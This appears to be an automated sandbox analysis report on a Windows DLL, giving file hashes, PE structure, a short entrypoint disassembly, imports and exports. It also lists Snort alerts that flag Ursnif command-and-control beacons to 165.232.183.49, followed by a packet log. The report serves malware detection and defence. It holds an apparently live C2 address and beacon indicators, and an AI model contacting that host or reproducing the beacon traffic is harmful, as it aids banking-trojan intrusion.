                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:3a94.dll
                              File size:621568
                              MD5:3a943173c6de419b7078e88c20997838
                              SHA1:56567824c6b5c62112a74daa7a1a66e2ec0505d3
                              SHA256:af98c908f45b6b7893b8cc3121517488c94a93d015af71cd86f8269a971a8836
                              SHA512:801f8f86158c23a44499fc8c5364cb6353a44fba09015d118341e1bd07a568fe4c2fe4b93ca691bb45b41b5f6ee2a6f73d7ffbfde3eb9cd7293295ffc530693c
                              SSDEEP:12288:DDq7QuHqfYJvHfikOqXr/nQKDEaKVOjTHCmjem/s9IoxAZgv6Hqip969aqnugCSh:/evfijqLvDEfYTiOem/i6lH69/2e6c
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..\..H\..H\..H.r.IW..H.r.I...H.r.IN..H.k.IS..H.k.IO..H.k.I}..HUbIHM..H\..H...H.h.I]..H.h.I]..H.h%H]..H.h.I]..HRich\..H.......

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x104dfd0
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x1000000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x60CB68D7 [Thu Jun 17 15:23:03 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:3618a66a29eac020b8f3ecc6a1cb392b

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              cmp dword ptr [ebp+0Ch], 01h
                              jne 00007F7060AE2B57h
                              call 00007F7060AE2EE8h
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007F7060AE29FAh
                              add esp, 0Ch
                              pop ebp
                              retn 000Ch
                              push ebp
                              mov ebp, esp
                              push 00000000h
                              call dword ptr [01122160h]
                              push dword ptr [ebp+08h]
                              call dword ptr [0112215Ch]
                              push C0000409h
                              call dword ptr [01122164h]
                              push eax
                              call dword ptr [01122168h]
                              pop ebp
                              ret
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push 00000017h
                              call 00007F7060B1BD9Ch
                              test eax, eax
                              je 00007F7060AE2B57h
                              push 00000002h
                              pop ecx
                              int 29h
                              mov dword ptr [0108C920h], eax
                              mov dword ptr [0108C91Ch], ecx
                              mov dword ptr [0108C918h], edx
                              mov dword ptr [0108C914h], ebx
                              mov dword ptr [0108C910h], esi
                              mov dword ptr [0108C90Ch], edi
                              mov word ptr [0108C938h], ss
                              mov word ptr [0108C92Ch], cs
                              mov word ptr [0108C908h], ds
                              mov word ptr [0108C904h], es
                              mov word ptr [0108C900h], fs
                              mov word ptr [0108C8FCh], gs
                              pushfd
                              pop dword ptr [0108C930h]
                              mov eax, dword ptr [ebp+00h]
                              mov dword ptr [0108C924h], eax
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [0108C928h], eax

                              Rich Headers

                              Programming Language:
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x8abd00x7e.text
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1222a40xb4.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x12c0000xe68.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x12d0000x2af4.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x91d40x54.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x92280x40.text
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x1220000x29c.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x89c4e0x89e00False0.646935913418data6.66432444049IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .data0x8b0000x968540x1a00False0.563551682692data5.65671037078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .idata0x1220000x11080x1200False0.428602430556data5.38081725829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .gfids0x1240000x71f70x7200False0.745922423246data5.77791689152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x12c0000xe680x1000False0.340087890625data3.21593318356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x12d0000x2af40x2c00False0.792702414773data6.66891196238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_DIALOG0x12c2500xf0dataEnglishUnited States
                              RT_DIALOG0x12c3400xe8dataEnglishUnited States
                              RT_DIALOG0x12c4280xccdataEnglishUnited States
                              RT_DIALOG0x12c4f80xc4dataEnglishUnited States
                              RT_DIALOG0x12c5c00x140dataEnglishUnited States
                              RT_DIALOG0x12c7000xecdataEnglishUnited States
                              RT_DIALOG0x12c7f00x142dataEnglishUnited States
                              RT_DIALOG0x12c9380x120dataEnglishUnited States
                              RT_DIALOG0x12ca580x144dataEnglishUnited States
                              RT_DIALOG0x12cba00x144dataEnglishUnited States
                              RT_MANIFEST0x12cce80x17dXML 1.0 document textEnglishUnited States

                              Imports

                              DLLImport
                              KERNEL32.dllGetStdHandle, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, ReadConsoleW, GetFileType, CreateFileW, CloseHandle, WriteConsoleW, GetSystemTimeAsFileTime, GetWindowsDirectoryA, GetSystemDirectoryA, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetStringTypeW, GetProcessHeap, GetTempPathA, VirtualProtect, GetCurrentDirectoryA, SetSystemPowerState, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, DecodePointer
                              USER32.dllLoadBitmapA, GetWindowLongA, DrawTextA, IsDialogMessageA, GetClassInfoExA, SetWindowTextA, GetIconInfo, SendMessageTimeoutA, DefWindowProcA, CheckDlgButton, ReleaseDC, CallNextHookEx, EnumWindows
                              GDI32.dllSetRectRgn, CreateFontA, AbortDoc, EndDoc, GetStockObject, PtVisible, SetAbortProc, GetPixel, CreateRectRgn, SelectClipRgn, GetTextMetricsA, CombineRgn
                              ole32.dllCoRegisterClassObject, CoRegisterSurrogate, CoUninitialize, CoInitialize
                              ADVAPI32.dllRegOpenKeyExA, OpenServiceA, OpenThreadToken, InitializeSecurityDescriptor, FreeSid, SetSecurityDescriptorDacl, SetEntriesInAclA, RegEnumKeyA, RegCloseKey, StartServiceCtrlDispatcherA, RegOpenKeyA, QueryServiceStatus, RegDeleteKeyA, RegQueryValueExA, AllocateAndInitializeSid, LookupPrivilegeValueA, SetServiceStatus, RegisterServiceCtrlHandlerA, OpenSCManagerA, RegCreateKeyExA, DeleteService, RegSetValueExA, OpenProcessToken, GetTokenInformation
                              WS2_32.dllWSACleanup, recv, htonl, htons, recvfrom, getservbyname, ntohs, socket, send, getservbyport, WSAStartup, getprotobynumber, setsockopt
                              COMDLG32.dllGetSaveFileNameA, GetOpenFileNameA
                              COMCTL32.dllImageList_DragEnter, ImageList_DragShowNolock, ImageList_ReplaceIcon, ImageList_DragMove

                              Exports

                              NameOrdinalAddress
                              Seasonthing10x104cc20
                              Seatforce20x104c3b0
                              Spaceclose30x104cad0
                              Time40x104c9d0

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              07/05/21-16:52:45.440840TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4971780192.168.2.5165.232.183.49
                              07/05/21-16:52:45.440840TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4971780192.168.2.5165.232.183.49
                              07/05/21-16:52:49.870626TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4972080192.168.2.5165.232.183.49
                              07/05/21-16:52:49.870626TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4972080192.168.2.5165.232.183.49
                              07/05/21-16:52:56.212973TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4972280192.168.2.5165.232.183.49
                              07/05/21-16:52:56.212973TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4972280192.168.2.5165.232.183.49
                              07/05/21-16:53:33.216042TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973080192.168.2.5165.232.183.49
                              07/05/21-16:53:33.216042TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973080192.168.2.5165.232.183.49
                              07/05/21-16:53:35.638649TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973480192.168.2.5165.232.183.49
                              07/05/21-16:53:35.638649TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973480192.168.2.5165.232.183.49

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 5, 2021 16:52:45.222950935 CEST4971880192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:45.222971916 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:45.417839050 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:45.417974949 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:45.421730995 CEST8049718165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:45.422086000 CEST4971880192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:45.440840006 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:45.681216002 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348056078 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348079920 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348092079 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348104000 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348114967 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348126888 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.348334074 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.349365950 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.349381924 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.349400043 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.349416971 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.349562883 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.542063951 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542104959 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542124033 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542146921 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542170048 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542191029 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542217016 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542232037 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.542246103 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542265892 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542278051 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.542285919 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542308092 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542326927 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.542329073 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.542366028 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.542402029 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.543889999 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.543920994 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.543945074 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.543966055 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.543992996 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.544050932 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.679311037 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.679361105 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.679398060 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.679399014 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.679438114 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.679438114 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.679445028 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.679542065 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738343000 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738400936 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738439083 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738477945 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738497019 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738527060 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738540888 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738563061 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738575935 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738584995 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738617897 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738656044 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738686085 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738692999 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738707066 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738732100 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738746881 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738769054 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738796949 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738816023 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738817930 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738847971 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.738867998 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.738897085 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845165968 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845199108 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845217943 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845235109 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845262051 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845279932 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845283985 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845304966 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845312119 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845326900 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845333099 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845350981 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845357895 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845371962 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845379114 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845393896 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845396042 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845418930 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845432997 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845454931 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845475912 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845477104 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845496893 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845504999 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845518112 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.845534086 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.845561028 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:46.873097897 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:46.873440981 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.009974957 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010013103 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010030985 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010052919 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010068893 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010094881 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010118961 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010142088 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010158062 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010181904 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010207891 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010231018 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010253906 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010277033 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010298967 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010322094 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010339022 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.010485888 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.010632992 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.042263985 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.042396069 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.174242973 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174278021 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174293995 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174316883 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174335957 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174360991 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174385071 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174406052 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174434900 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174465895 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174556971 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.174676895 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.174776077 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174798965 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174823999 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174849033 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174871922 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174884081 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.174894094 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174921036 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.174941063 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.175000906 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.204087019 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.204268932 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.215370893 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.215595007 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.236092091 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.236257076 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.339597940 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339639902 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339684963 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339713097 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339742899 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339770079 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339797020 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339823961 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339847088 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339847088 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.339878082 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.339960098 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.340190887 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340223074 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340245962 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340270042 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340281963 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.340292931 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340318918 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340347052 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.340363979 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.340445042 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.368200064 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.368381977 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.425988913 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.426023006 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.426143885 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.429734945 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.429856062 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.504941940 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.504975080 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505008936 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505036116 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505058050 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505078077 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505086899 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505099058 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505116940 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505120993 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505141020 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505161047 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505177021 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505182028 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505203009 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505207062 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505230904 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505233049 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505253077 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505275011 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505275011 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505296946 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505312920 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505317926 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.505341053 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.505383968 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.534430027 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.534586906 CEST4971780192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:47.589199066 CEST8049717165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:47.589232922 CEST8049717165.232.183.49192.168.2.5
